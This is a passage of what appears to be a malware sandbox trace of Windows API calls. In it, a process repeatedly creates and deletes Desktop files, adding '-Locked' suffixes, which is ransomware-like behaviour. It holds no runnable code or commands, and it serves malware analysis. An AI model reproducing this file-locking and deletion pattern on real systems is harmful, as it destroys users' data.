lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x5b [0310.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0310.010] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg-locked-locked-locked-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0310.046] GetFileType (hFile=0x480) returned 0x1 [0310.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0310.046] GetFileType (hFile=0x480) returned 0x1 [0310.049] CloseHandle (hObject=0x480) returned 1 [0310.103] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x54 [0310.103] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg-locked-locked-locked-locked-locked-locked")) returned 1 [0310.113] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x60 [0310.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0310.113] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4-0bkiu_zvudt.mkv-locked-locked-locked-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0310.117] GetFileType (hFile=0x480) returned 0x1 [0310.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0310.117] GetFileType (hFile=0x480) returned 0x1 [0310.118] CloseHandle (hObject=0x480) returned 1 [0310.119] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x59 [0310.119] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4-0bkiu_zvudt.mkv-locked-locked-locked-locked-locked-locked")) returned 1 [0310.129] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", lpFilePart=0x0) returned 0x69 [0310.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0310.129] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0310.205] GetFileType (hFile=0x480) returned 0x1 [0310.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0310.205] GetFileType (hFile=0x480) returned 0x1 [0310.206] CloseHandle (hObject=0x480) returned 1 [0310.207] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", lpFilePart=0x0) returned 0x62 [0310.207] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe")) returned 0 [0310.210] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked", lpFilePart=0x0) returned 0x70 [0310.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0310.210] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0310.217] GetFileType (hFile=0x480) returned 0x1 [0310.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0310.217] GetFileType (hFile=0x480) returned 0x1 [0310.219] CloseHandle (hObject=0x480) returned 1 [0310.222] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", lpFilePart=0x0) returned 0x69 [0310.222] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-locked")) returned 1 [0310.233] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked-Locked", lpFilePart=0x0) returned 0x77 [0310.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0310.234] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0310.269] GetFileType (hFile=0x480) returned 0x1 [0310.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0310.269] GetFileType (hFile=0x480) returned 0x1 [0310.271] CloseHandle (hObject=0x480) returned 1 [0310.271] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked", lpFilePart=0x0) returned 0x70 [0310.272] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-locked-locked")) returned 1 [0310.325] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked-Locked", lpFilePart=0x0) returned 0x37 [0310.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0310.326] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\autorun.inf-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0310.330] GetFileType (hFile=0x480) returned 0x1 [0310.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0310.330] GetFileType (hFile=0x480) returned 0x1 [0310.331] CloseHandle (hObject=0x480) returned 1 [0310.332] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked", lpFilePart=0x0) returned 0x30 [0310.332] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\autorun.inf-locked")) returned 1 [0310.391] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3e [0310.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0310.391] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\autorun.inf-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0310.393] GetFileType (hFile=0x480) returned 0x1 [0310.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0310.393] GetFileType (hFile=0x480) returned 0x1 [0310.395] CloseHandle (hObject=0x480) returned 1 [0310.395] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked-Locked", lpFilePart=0x0) returned 0x37 [0310.396] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\autorun.inf-locked-locked")) returned 1 [0310.397] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked-Locked", lpFilePart=0x0) returned 0x3d [0310.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0310.397] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0310.481] GetFileType (hFile=0x480) returned 0x1 [0310.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0310.481] GetFileType (hFile=0x480) returned 0x1 [0310.483] CloseHandle (hObject=0x480) returned 1 [0310.484] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked", lpFilePart=0x0) returned 0x36 [0310.484] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij-locked")) returned 1 [0310.563] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked-Locked-Locked", lpFilePart=0x0) returned 0x44 [0310.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0310.563] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0310.566] GetFileType (hFile=0x480) returned 0x1 [0310.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0310.566] GetFileType (hFile=0x480) returned 0x1 [0310.568] CloseHandle (hObject=0x480) returned 1 [0310.569] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked-Locked", lpFilePart=0x0) returned 0x3d [0310.569] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij-locked-locked")) returned 1 [0310.572] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked-Locked", lpFilePart=0x0) returned 0x42 [0310.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0310.572] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\csi0 apq22kpfx84um.doc-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0310.634] GetFileType (hFile=0x480) returned 0x1 [0310.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0310.634] GetFileType (hFile=0x480) returned 0x1 [0310.636] CloseHandle (hObject=0x480) returned 1 [0310.637] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked", lpFilePart=0x0) returned 0x3b [0310.637] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\csi0 apq22kpfx84um.doc-locked")) returned 1 [0310.647] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked-Locked-Locked", lpFilePart=0x0) returned 0x49 [0310.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0310.647] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\csi0 apq22kpfx84um.doc-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0310.695] GetFileType (hFile=0x480) returned 0x1 [0310.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0310.695] GetFileType (hFile=0x480) returned 0x1 [0310.698] CloseHandle (hObject=0x480) returned 1 [0310.699] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked-Locked", lpFilePart=0x0) returned 0x42 [0310.700] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\csi0 apq22kpfx84um.doc-locked-locked")) returned 1 [0310.713] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked-Locked", lpFilePart=0x0) returned 0x35 [0310.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0310.713] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cx4ag.doc-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0310.809] GetFileType (hFile=0x480) returned 0x1 [0310.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0310.811] GetFileType (hFile=0x480) returned 0x1 [0310.812] CloseHandle (hObject=0x480) returned 1 [0310.813] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked", lpFilePart=0x0) returned 0x2e [0310.813] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cx4ag.doc-locked")) returned 1 [0310.826] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3c [0310.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0310.827] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cx4ag.doc-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0310.877] GetFileType (hFile=0x480) returned 0x1 [0310.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0310.877] GetFileType (hFile=0x480) returned 0x1 [0310.880] CloseHandle (hObject=0x480) returned 1 [0310.880] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked-Locked", lpFilePart=0x0) returned 0x35 [0310.880] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cx4ag.doc-locked-locked")) returned 1 [0310.885] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x3d [0310.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0310.886] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d-a24dz0snvx.xlsx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0310.887] GetFileType (hFile=0x480) returned 0x1 [0310.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0310.887] GetFileType (hFile=0x480) returned 0x1 [0310.889] CloseHandle (hObject=0x480) returned 1 [0310.889] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked", lpFilePart=0x0) returned 0x36 [0310.890] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d-a24dz0snvx.xlsx-locked")) returned 1 [0311.018] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x44 [0311.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.038] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d-a24dz0snvx.xlsx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.040] GetFileType (hFile=0x480) returned 0x1 [0311.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.040] GetFileType (hFile=0x480) returned 0x1 [0311.042] CloseHandle (hObject=0x480) returned 1 [0311.042] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x3d [0311.042] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d-a24dz0snvx.xlsx-locked-locked")) returned 1 [0311.043] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x37 [0311.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.043] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.044] GetFileType (hFile=0x480) returned 0x1 [0311.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.044] GetFileType (hFile=0x480) returned 0x1 [0311.046] CloseHandle (hObject=0x480) returned 1 [0311.046] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked", lpFilePart=0x0) returned 0x30 [0311.046] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\desktop.ini-locked")) returned 1 [0311.047] GetFullPathNameW (in: 